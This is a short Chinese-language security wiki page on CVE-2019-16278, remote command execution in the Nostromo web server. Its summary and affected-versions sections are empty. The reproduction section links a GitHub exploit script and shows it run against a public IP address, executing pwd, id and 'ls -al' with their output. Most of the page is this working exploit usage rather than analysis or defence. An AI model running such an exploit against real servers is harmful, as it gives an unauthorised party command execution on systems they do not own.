menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right (CVE-2019-16278)Nostromo httpd 命令执行 chevron_right (CVE-2019-16278)Nostromo httpd 命令执行.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    (CVE-2019-16278)Nostromo httpd 命令执行.md
    672 B / 2021-07-15 19:58:10
        (CVE-2019-16278)命令执行
    ==========================
    
    一、漏洞简介
    ------------
    
    (CVE-2019-16278)命令执行
    
    二、影响范围
    ------------
    
    三、复现过程
    ------------
    
    <https://github.com/ianxtianxt/CVE-2019-16278/>
    
        ➜  Downloads python nostromo.py 114.114.114.114 8080 pwd
        /bin
        ➜  Downloads python nostromo.py 114.114.114.114 8080 id
        uid=65534 gid=65534
        ➜  Downloads python nostromo.py 114.114.114.114 8080 "ls -al"
        drwxr-xr-x    2 0        0                0 Apr 12  2013 .
        drwxr-xr-x   16 0        0                0 Jan  1  1970 ..
        lrwxrwxrwx    1 0        0                7 Apr 12  2013 ash -> busybox
    
    
    links
    file_download